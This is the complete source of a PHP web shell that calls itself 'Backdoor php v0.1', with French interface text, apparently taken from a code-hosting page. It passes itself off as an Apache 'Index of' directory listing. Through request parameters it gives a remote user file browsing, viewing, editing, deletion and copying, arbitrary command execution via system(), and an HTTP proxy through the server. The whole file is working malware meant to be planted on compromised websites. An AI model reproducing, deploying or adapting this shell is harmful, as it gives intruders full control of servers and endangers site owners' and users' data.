182 lines
5.8 KiB
Plaintext
182 lines
5.8 KiB
Plaintext
<?
|
|
/*
|
|
Backdoor php v0.1
|
|
Coded By Charlichaplin
|
|
charlichaplin@gmail.com
|
|
Join me: irc.fr.worldnet.net #s-c
|
|
Greetz: My dog :)
|
|
*/
|
|
|
|
class backdoor {
|
|
var $pwd;
|
|
var $rep;
|
|
var $list = array();
|
|
var $file;
|
|
var $edit;
|
|
var $fichier;
|
|
var $del;
|
|
var $shell;
|
|
var $proxy;
|
|
|
|
function dir() {
|
|
if(!empty($this->rep)) {
|
|
$dir = opendir($this->rep);
|
|
} else {
|
|
$dir = opendir($this->pwd);
|
|
}
|
|
while($f = readdir($dir)) {
|
|
if ($f !="." && $f != "..") {
|
|
$this->list[] = $f;
|
|
}
|
|
}
|
|
}
|
|
|
|
function view() {
|
|
|
|
$this->file = htmlentities(highlight_file($this->file));
|
|
}
|
|
|
|
function edit() {
|
|
if(!is_writable($this->edit)) {
|
|
echo "Ecriture impossible sur le fichier";
|
|
} elseif(!file_exists($this->edit)) {
|
|
echo "Le fichier n'existe pas ";
|
|
} elseif(!$this->fichier) {
|
|
$fp = fopen($this->edit,"r");
|
|
$a = "";
|
|
while(!feof($fp)) {
|
|
$a .= fgets($fp,1024);
|
|
}
|
|
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
|
|
} else {
|
|
$fp = fopen($this->edit,"w+");
|
|
fwrite($fp, $this->fichier);
|
|
fclose($fp);
|
|
echo "Le fichier a été modifié";
|
|
|
|
}
|
|
}
|
|
|
|
function del() {
|
|
if(is_file($this->del)) {
|
|
if(unlink($this->del)) {
|
|
echo "Fichier supprimé";
|
|
} else {
|
|
echo "Vous n'avez pas les droits pour supprimer ce fichier";
|
|
}
|
|
} else {
|
|
echo $this->del." n'est pas un fichier";
|
|
}
|
|
}
|
|
|
|
function shell() {
|
|
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
|
|
system($this->shell);
|
|
}
|
|
|
|
function proxy($host,$page) {
|
|
|
|
$fp = fsockopen($host,80);
|
|
if (!$fp) {
|
|
echo "impossible d'etablir un connection avec l'host";
|
|
} else {
|
|
$header = "GET ".$page." HTTP/1.1\r\n";
|
|
$header .= "Host: ".$host."\r\n";
|
|
$header .= "Connection: close\r\n\r\n";
|
|
fputs($fp,$header);
|
|
while (!feof($fp)) {
|
|
$line = fgets($fp,1024);
|
|
echo $line;
|
|
}
|
|
fclose($fp);
|
|
}
|
|
}
|
|
|
|
function ccopy($cfichier,$cdestination) {
|
|
if(!empty($cfichier) && !empty($cdestination)) {
|
|
copy($cfichier, $cdestination);
|
|
echo "Le fichier a été copié";
|
|
} else {
|
|
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
|
|
}
|
|
}
|
|
}
|
|
if(!empty($_REQUEST['rep'])) {
|
|
$rep = $_REQUEST['rep']."/";
|
|
}
|
|
$pwd = $_SERVER['SCRIPT_FILENAME'];
|
|
$pwd2 = explode("/",$pwd);
|
|
$file = $_REQUEST['file'];
|
|
$edit = $_REQUEST['edit'];
|
|
$fichier = $_POST['fichier'];
|
|
$del = $_REQUEST['del'];
|
|
$shell = $_REQUEST['shell'];
|
|
$proxy = $_REQUEST['proxy'];
|
|
$copy = $_REQUEST['copy'];
|
|
$cfichier = $_POST['cfichier'];
|
|
$cdestination = $_POST['cdestination'];
|
|
|
|
$n = count($pwd2);
|
|
$n = $n - 1;
|
|
$pwd = "";
|
|
for ($i = 0;$i != $n;$i = $i+1) {
|
|
$pwd .= "/".$pwd2[$i];
|
|
}
|
|
|
|
if($proxy) {
|
|
$host2 = explode("/",$proxy);
|
|
$n = count($host2);
|
|
$host = $host2[2];
|
|
$page = "";
|
|
for ($i = 3;$i != $n;$i = $i+1) {
|
|
$page .= "/".$host2[$i];
|
|
}
|
|
echo $page;
|
|
}
|
|
|
|
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
|
|
$backdoor = new backdoor();
|
|
$backdoor->pwd = $pwd;
|
|
$backdoor->rep = $rep;
|
|
$backdoor->file = $file;
|
|
$backdoor->edit = $edit;
|
|
$backdoor->fichier = $fichier;
|
|
$backdoor->del = $del;
|
|
$backdoor->shell = $shell;
|
|
$backdoor->proxy = $proxy;
|
|
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
|
|
$backdoor->dir();
|
|
|
|
echo "</TD></TR></TABLE><PRE>";
|
|
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
|
|
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
|
|
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
|
|
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
|
|
echo "<HR noshade align=\"left\" width=\"80%\">";
|
|
|
|
if($file) {
|
|
$backdoor->view();
|
|
} elseif($edit) {
|
|
$backdoor->edit();
|
|
} elseif($del) {
|
|
$backdoor->del();
|
|
} elseif($shell) {
|
|
$backdoor->shell();
|
|
}elseif($proxy) {
|
|
$backdoor->proxy($host,$page);
|
|
}elseif($copy == 1) {
|
|
$backdoor->ccopy($cfichier,$cdestination);
|
|
} else {
|
|
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
|
|
foreach ($backdoor->list as $key => $value) {
|
|
if(is_dir($rep.$value)) {
|
|
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
|
|
} else {
|
|
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
|
|
}
|
|
}
|
|
}
|
|
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
|
|
echo "<center><b>Coded By Charlichaplin</b></center>";
|
|
echo "</BODY></HTML>";
|